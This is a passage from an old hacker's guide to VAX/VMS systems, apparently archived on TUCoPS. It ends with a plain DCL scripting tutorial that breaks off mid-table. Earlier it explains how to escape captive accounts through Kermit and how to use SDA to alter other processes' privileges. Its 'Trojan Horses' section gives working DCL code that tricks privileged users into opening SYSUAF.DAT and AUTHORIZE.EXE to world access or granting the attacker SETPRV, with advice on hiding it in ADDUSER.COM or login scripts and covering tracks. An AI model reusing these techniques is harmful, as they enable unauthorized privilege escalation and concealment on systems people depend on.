[spawn] !spawn a subprocess
[local] !enter VMS commands
-------------------------------------------------------------------------------
The last two commands (in brackets) are not always found on every system, but
briefly they allow you to spawn a subprocess (often useful when you are tied up
in a non-breakable account) and local which can again be used to spawn or issue
other DCL commands. There are often other commands, varying on what version of
KERMIT is being run. One important note is that SPAWN cannot be issued from a
CAPTIVE account, but LOCAL (or an equivalent) can. However, if the system
manager is smart he may set up the UAF record to specify that only one process
can be active with that account at any one time. If this is the case it will
give you a message telling you that you have exceeded the quota allocated. The
only way around it is to actually modify the record in SYSUAF.DAT Obviously the
important commands are SEND,RECEIVE and CONNECT. Once you issue CONNECT, you
can dial out long distance or whatever, just by using regular AT commands.
SEND and RECEIVE are self explanatory so I wont go into them.
DECSERVERS
----------
This deserves a little bit of attention also. Basically DECservers allow the
the user to easily switch between various nodes in a cluster. Unless you are
logging in directly to a terminal, you will usually not encounter this. If you
do, heres what you will see:
Enter Username>
Or something of the like. At this point you should just type A or C or
whatever else. It is just a terminal identifier and means absolutely nothing.
At this point you will get a prompt such as:
LOCAL>
Here you can do a limited number of commands. The important ones are:
LOCAL> show users
This will show the users on the DECserver, and what machines they are connected
to etc. To view all the machines on the server, type:
LOCAL> show nodes
This will present a list of the callable nodes. To connect to any one of these
you would issue a command such as:
LOCAL> connect SBSU
This is assuming the nodename was SBSU. That's basically all there is to the
DECservers. The other commands are really not that useful to the beginning VAX
hacker but can nonetheless be referenced by typing HELP at the LOCAL prompt.
SYSTEM DUMP ANALYZER
--------------------
Although the SDA is not really for beginners, it is such an important topic
that I thought I would give a really brief overview of what it is all about.
Basically to call up SDA, type:
$analyze/system
This will return you with the prompt:
SDA>
At this point you can do many great things. Oh, before I continue, it should
be noted that you need CMKRNL privilege in order to run this program. In any
case, once you get the SDA prompt, there are several interesting things you can
do. Basically, SDA is a watching tool. It lets you keep track of what other
processes on the system are doing. To get information on another process just
type:
SDA> show process [username]
you should put in a person who is logged in where I have put the [username]
variable. This will give you a page of useful information on that specific
process. The interesting thing is that with the SDA, you can access any part
of memory, unlike EXAMINE from DCL. You can for example get the PCB address
for a process and then go in and either view or modify things such as privs,
priority etc. You can also view other processes type-ahead buffers, and see
what they are doing. Like I stated earlier, this is a relatively advanced
topic and doesn't fit well into a beginners file, so I will leave it at this,
but here I will provide a diagram of the PCB block so that you can see which
bytes do what:
- SOFTWARE PCB DETAILED LAYOUT -
BLOCK 1 BLOCK 2
+---------------+ +---------------+
:pcb$l_sqfl ! ! ! !:pcb$t_terminal
+---------------+ ! !
:pcb$l_sqbl ! ! +---------------+
+---+---+-------+ ! ! :pcb$l_pqb
:pcb$b_type ! ! ! ! :pcb$w_size +---------------+
pcb$b_pri +---+---+---+---+ ! ! :pcb$l_efcs
:pcb$w_mtxcnt ! ! ! ! :pcb$b_astact +---------------+
+-------+---+---+ pcb$b_asten ! ! :pcb$l_efc2p
:pcb$l_astqfl ! ! +---------------+
+---------------+ ! ! :pcb$l_efc3p
:pcb$l_astqbl ! ! +---------------+
+---------------+ ! ! :pcb$l_pid
:pcb$l_phypcb ! ! +---------------+
+---------------+ ! ! :pcb$l_phd
:pcb$l_owner ! ! +---------------+
+---------------+ ! ! :pcb$t_lname
:pcb$l_wsswp ! ! ! !
+---------------+ ! !
:pcb$l_sts ! ! +---------------+
+---------------+ ! ! :pcb$l_jib
:pcb$lwtime ! ! +---------------+
+---+---+-------+ ! ! :pcb$q_priv
:pcb$b_wefc ! ! ! ! :pcb$w_state ! !
pcb$b_prib +---+---+-------+ +---------------+
:pcb$w_tmbu ! ! ! :pcb$w_aptcnt ! ! :pcb$l_arb
+-------+-------+ +---------------+
:pcb$w_ppgcnt ! ! ! :pcb$w_gpgcnt ! ! :pcb$l_uic
+-------+-------+ +---------------+
:pcb$w_biocnt ! ! ! :pcb$w_astcnt ! ! :pcb$l_lockqfl
+-------+-------+ +---------------+
:pcb$w_diocnt ! ! ! :pcb$w_biolm ! ! :pcb$l_lockqbl
+-------+-------+ +---------------+
:pcb$w_prccnt ! ! ! :pcb$w_diolm ! ! :pcb$l_dlckpri
+-------+-------+ +---------------+
NOTE: BLOCK 2 is just a continuation of BLOCK 1. The PCB is the Process
Control Block which is assigned to each process. It holds all the
relevant information for the particular process. The address for
the PCB is shown when you execute the SHOW PROCESS <user> from SDA
Note that when you are examining memory you can specify addresses in two ways:
1) locationA:locationB -from locationA to locationB
2) locationA;numbytes -from locationA to locationA+numbytes
FURTHER HELP
------------
Like I have stressed throughout this file, the best way to learn about VMS is
to use the ONLINE HELP that is available on virtually every VAX. You may have
also noticed that certain programs such as MAIL have self-contained help which
is not seemingly accessible from the normal HELP. So how do you get that
information?! Well, all the extra help files for programs such as MAIL, SDA,
AUTHORIZE, etc are all stored in the SYS$HELP directory. The only problem is
that they are not in very human readable form. To get a properly formatted
text output you can use the LIBRARY command. Here is an example that dumps all
the help file on SDA into a file called SDA.HLP in your directory:
$library/extract=(*)/output=sys$login:sda sys$help:sda.hlb
Now to explain this line. The library program will extract the SDA help file
(sys$help:sda.hlb) and put it into your login directory (sys$login:sda.hlp).
Where I have put the (*), you can alternatively put any number of commands that
you may want referenced. The (*) will dump ALL the commands into the help file
For example to ONLY get the SHOW command and its qualifiers (for SDA) into a
file, you may try something like:
$library/extract=(show)/output=sys$login:sda_show sys$help:sda.hlb
Since the files generated from this command is standard ASCII, you can read
these help files with the TYPE command, ie.
$type sys$login:sda.hlp
The same method can be utilized for any of the other commands to which you
normally do not have access, eg. AUTHORIZE, SDA etc. This way you can learn
and understand the command without necessarily having the privilege of reading
it in the first place. Of course I recommend that you read both the AUTHORIZE
and SDA files since they are probably the most useful files in the bunch. To
get a list of the other help files, just do:
$dir sys$help:*.hlb
Then you can specify any of the listed files in the LIBRARY command. If you
create these files, just make sure you delete them, once you are through with
using them, especially if they are in someone elses ACTIVE account.
TROJAN HORSES
-------------
Lets suppose you have done all you can in trying to gain privileges, and you
have neither come up with a high level account, or any mechanism of boosting
your privs. Now what? Well the following methods I will describe should be able
to net you more privileges but there is one small problem. These methods
usually involve modifying or creating new files in certain places. If the
system manager were to notice such a file, he could simply perform a DIR/OWNER
and would know which account someone was hacking on, and he would no doubt
change the password or kill the account. Now this is an IF situation. Although
theres a good chance you will get away with it, you still have that risk factor
that says that you may very well lose this particular VAX. So if this is the
only VAX that you have access to, and you are still in the learning process,
don't try these techniques. Once you have learned the operating system well
enough and feel that you can afford to lose the VAX if worst comes to worse
then you can proceed with these time honoured techniques:
Ok so what is a trojan horse? Based on the original definitions for such
programs, a trojan is simply a file that you have someone execute which
performs some arbitrary task unbeknownst to the user. Of course there are the
typical trojan programs that go through the logon sequence and try and procure
user/password combinations. This is fine, but what about other methods? Its
fine for getting more accounts, some which may be possibly privileged, but you
still aren't guaranteed to get a good account. So what do you do?! Well, as
everyone should know by now, the easiest way to get more privileges is to give
them to your user via the AUTHORIZE program. The problem is that on all VAXes,
the SYSUAF.DAT file is read/write protected and on some even the AUTHORIZE file
itself is protected. The key is to unlock these files, so that they can be
accessed through the WORLD protection field. The easiest way to do this is to
have a privileged user unwittingly do the dirty deed for you. Here I will
describe a few methods of accomplishing such a task.
The key here is to find a COM file that the users often use. This could be
anything from some simple utility to a full featured DCL program such as
ADDUSER.COM. What I usually do is search through the system symbols (SHOW
SYMBOL *) and logical table (SHOW LOGICAL) for definitions that are executed
via COM files. Often you will find in the symbol table some weird utility
like NOTES that everybody executes. Lets assume you have found a prospective
program. The next thing to check is to see if you write access to the
direcotry in which this file resides. If you have READ access also, then you
can simply put in your TROJAN coding right within the main program (after
saving the original copy somewhere safe). If you don't have read access, then
you can create a program with the same filename. Since your program will have
a higher version number, it will get executed instead of the original program.
Then you perform your deed and delete the TROJAN and continue on and execute
the real COM file. Here is an example, which is a fragment of a DCL routine
but can easily be changed to fit inside another routine.
$ pre_prvs=f$setprv("setprv")
$ if f$privilege("setprv") then goto fix
$ @notes.com;55
$ fix:
$ set prot sys$system:sysuaf.dat/prot=(w:rwed)
$ set prot sys$system:authorize.exe/prot=(w:rwed)
$ pre_prvs=f$setprv(pre_prvs)
$ @notes.com;55
In this example we have created another file called notes.com;56 in the proper
directory. Whenever someone types in NOTES this file gets executed instead of
the original. When control is passed here, it checks if the user has SETPRV
privilege. If he doesn't, it continues on with the normal program
(NOTES.COM;55) If the user has the SETPRV privilege, you have the program
change the protection on SYSUAF.DAT and AUTHORIZE.EXE to full World Access.
This means that you can now run AUTHORIZE from ANY ACCOUNT no matter how lowly
it is!!! Is that awesome or what?! Once the protection has been changed, you
can erase the notes.com;56 file and no one will ever know anything happened!
Similarly if you modified the actual DCL program, then you just copy back the
original. Remember its extremely important to tidy up after yourself once you
are done!
Here is another example, which you may want to try. First of course you MUST
check for the privileges of the user (just like in the above program), then
try:
$open/write file sys$scratch:adduaf.tmp
$write file "$ RUN SYS$SYSTEM:AUTHORIZE"
$write file "MODIFY NAME/PRIV=SETPRV"
$close file
$@sys$scratch:adduaf.tmp/output=sys$scratch:adduaf.dat
$del sys$scratch:adduaf.*;*
This little patch in the coding will modify your own users privileges and give
them SETPRV when the superuser executes this routine. The trick is to hide it
within some other program so he doesn't even realize he has done anything! Of
course after the routine has been successfully executed, the original coding
should be put back. There are many places you can put this routine, including
ADDUSER.COM (if you have write access)! That would mean, every time the
system manager went to add a new user, he would also boost your privs! HaHa,
quite ironic eh?! The farthest thing that he wants to do, and you make him do
it without even realizing. Of course you should use your imagination and put
this or a similar routine in a place where it will be quickly executed. The
longer the code stays around without being execute, the more chance that it
will be discovered. An optimum program would be something that the
users/operators execute frequently (eg notes, mail, phone etc) Other good
places are the LOGIN.COM and SYLOGIN.COM files. Just remember to cover your
tracks once you're done!!
This is but a brief introduction to Trojans and the like. You should use your
own imagination to come up with other ways of making the system operators
succumb to your wishes...heh heh.
DCL PROGRAMMING
---------------
No file would be complete without at least mentioning programming Command
Procedures. Basically, these are like BAT files from MS-DOS or script files
from UNIX. They form a rudimentary but powerful language that allows you to
quickly create small programs to handle most simple tasks. This section is not
intended to be a a full blown tutorial on programming in DCL, rather its an
introduction to what it is all about.
It is quite easy to pick up programming in DCL and the best way to learn is to
have a look at some of the COM files you will find on the various VAXes that
you hack on. By studying these, you can quickly learn the methods on how to
perform
certain routines. Below I have listed some of the commonly needed routines
when programming in DCL:
PASSING PARAMETERS
Parameters can be passed to DCL programs directly from the shell in several
ways. Here are a few examples:
(1) @sample 24 25
When you execute this, the values 24 and 25 are passed to the sample.com
file in the variables p1 and p2 respectively. ie p1=24, p2=25
(2) @sample Paul Cramer
p1=PAUL, p2=CRAMER
(3) @sample "Paul Cramer"
p1=Paul, p2=Cramer
(4) name= "Paul Cramer"
@sample 'name'
This example demonstrates the method of passing predefined variables to a
command procedure. In this case, p1=PAUL, p2=CRAMER
(5) name ="""Paul Cramer"""
@sample 'name'
Note that passing the variable in three double-quotes preserves the case.
p1=Paul, p2=Cramer
GETTING INPUT
Often it is necessary to get some sort of input from the user when executing
a command procedure. This is performed through the INQUIRE command. Some
examples follow:
(1) INQUIRE variable "prompt"
This will display the 'prompt' message and then wait for input. The string
passed is kept in 'variable'
(2) INQUIRE/NOPUNC variable "prompt"
When you specify /NOPUNC, the prompt will NOT be followed by a colon and
space as is the default.
(3) INQUIRE/LOCAL variable "prompt"
INQUIRE/GLOBAL variable "prompt"
It should be noted that if you specify /LOCAL, the variable will remain in
the local symbol table accessible only by this particular COM file. If on
the other hand, you specify /GLOBAL, the variable is placed in the global
symbol table and is made accessible to other files.
(4) IF pn .eqs. "" THEN INQUIRE pn "prompt"
You can use this method to check if a certain variable (pn in this case) is
null or not. If it is, you can ask for input.
(5) READ/PROMPT="prompt" SYS$COMMAND variable
This is another method of getting input.
SUPPLY INPUT FOR A PROGRAM
Often you may need to create a file and get input from some outside source.
Again there are several ways of doing this. Here I will outline three
different methods:
FROM DATA :- CREATE TEST.DAT
data line 1
data line 2
:
:
etc etc
FROM TERMINAL :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND
CREATE TEST.DAT
FROM A FILE :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT
CREATE TEST.FILE
OUTPUTTING INFORMATION
In general when outputting information, you should always send it to SYS$OUTPUT
What this does is automatically write to whatever the user has defined as
SYS$OUTPUT. It doesn't matter what type of terminal or whatever it is, but it
will send it in the correct format. Some examples follow:
(1) WRITE SYS$OUTPUT "literal text"
This will print 'literal text' on your terminal.
(2) WRITE SYS$OUTPUT symbol-name
This will print on your terminal whatever value is held in symbol-name
(3) WRITE SYS$OUTPUT "literal text ''symbol-name' literal text"
This example shows how you can mix in normal text with a variable and
follow it by more text.
(4) TYPE SYS$INPUT
this is a sample message
that is spread out over
several lines.
You would use this method whenever there are more than a few lines of text
to be printed.
WRITING TO A FILE
You will find that many times when writing a COMmand procedure you will need to
save certain information to a file. This can be accomplished with a routine
similar to:
OPEN/WRITE FILE TEST.DAT
WRITE:
INQUIRE DATA "Input Data"
IF DATA .EQS. "" THEN GOTO DONE
WRITE FILE DATA
GOTO WRITE
DONE:
CLOSE FILE
I will give a quick breakdown of what is going on here. First you open the
file that you want, including the /WRITE qualifier followed by the filename.
This sample program simply inputs data, writes each line to a file and exits
when the user hits RETURN on a blank line. Simple but effective text input
facility.
READING A FILE
Once you have written a file, you will often need to read that information back
in again. For example you may keep track of when the person last ran the file.
Each time the file is run, you would save the time/date to a file, and then
read it back in, and display it on each subsequent execution. The sample
structure of a read routine would be:
OPEN/READ FILE TEST.DAT
READ:
READ/END_OF_FILE=DONE FILE DATA
.
.
.
GOTO READ
DONE:
CLOSE FILE
This routine would loop and keep reading a file, one line at a time, storing
the information in DATA until the end of file is detected.
CONDITIONAL LOGIC
No programming language would be complete without the ability to perform logic.
Although it is very simplistic, it provides just enough power to handle most
simple conditions. Some examples:
(1) IF p1 .EQS. "" THEN GOTO DEFAULT
In this example the procedure checks to see if the parameter passed in p1
is NULL or not. If it is then the program branches to DEFAULT
(2) IF p1 .NES. 10 THEN GOTO end_label
.
.
.
END_LABEL:
Here we see that if p1 does not equal 10 then the program branches to
END_LABEL, otherwise it continues.
(3) COUNT = 0
LOOP:
COUNT=COUNT+1
.
.
.
IF COUNT .LE. 10 THEN GOTO LOOP
EXIT
This example shows how to establish a loop in a command procedure, using
the symbol COUNT and an IF statement. The IF statement checks the value
of COUNT and performs an EXIT when the value is greater than 10
EXPRESSIONS
The data operations and comparisons are listed below in order of precedence
beginning with the highest (operations and comparisons grouped together in the
table have the same precedence).
+--------+---------------------------------------------------------+
Operator Description
+--------+---------------------------------------------------------+
+ Indicates a positive number
- Indicates a negative number
+--------+---------------------------------------------------------+
* Multiplies two numbers
/ Divides two numbers
+--------+---------------------------------------------------------+
+ (1) Adds two numbers
(2) Concatenates two character strings
- (1) Subtracts two numbers
(2) Subtracts two character strings
+--------+---------------------------------------------------------+
.EQS. Tests if two character strings are equal
.GES. Tests if first character string is greater than or equal
.GTS. Tests if first character string is greater than
.LES. Tests if first character string is less than or equal
.LTS. Tests if first character string is less than
.NES. Tests if two character strings are not equal
.EQ. Tests if two numbers are equal
.GE. Tests if first number is greater than or equal to
.GT. Tests if first num
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
